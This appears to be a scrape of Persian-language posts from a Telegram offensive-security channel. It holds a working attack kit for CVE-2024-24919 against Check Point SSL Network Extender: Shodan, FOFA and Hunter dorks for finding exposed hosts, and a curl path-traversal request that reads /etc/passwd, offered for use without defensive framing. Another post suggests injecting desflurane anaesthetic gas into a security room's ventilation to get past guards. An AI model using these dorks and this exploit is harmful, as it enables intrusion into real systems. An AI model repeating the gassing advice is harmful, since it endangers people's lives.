چنتا کتاب دیگه هم که تو بحث Post Exploit و Red team شاید دنبالشون باشین
خودم برسی نکردم همرو
@matitanium
خودم برسی نکردم همرو
@matitanium
❤5👍1
حمله فیزیکی به یک سازمان که حراستش خیلی گیره؟
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
😈10👍1
CVE-2024–24919
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
CyberSecurity
CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: noscript="Check Point SSL Network Extender" SHODAN: http.noscript="Check Point SSL Network Extender" @matitanium
Exploit
curl -k -X POST "https://{ip}/clients/MyCRL" \ -H "Host: {ip}/" \ -H "User-Agent: Mozilla/5.0 (Macintosh:@Matitanium; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \ -H "Te: trailers" \ -H "Dnt: 1" \ -H "Connection: keep-alive" \ -H "Content-Length: 48" \ --data "aCSHELL/../../../../../../../../../../../etc/passwd"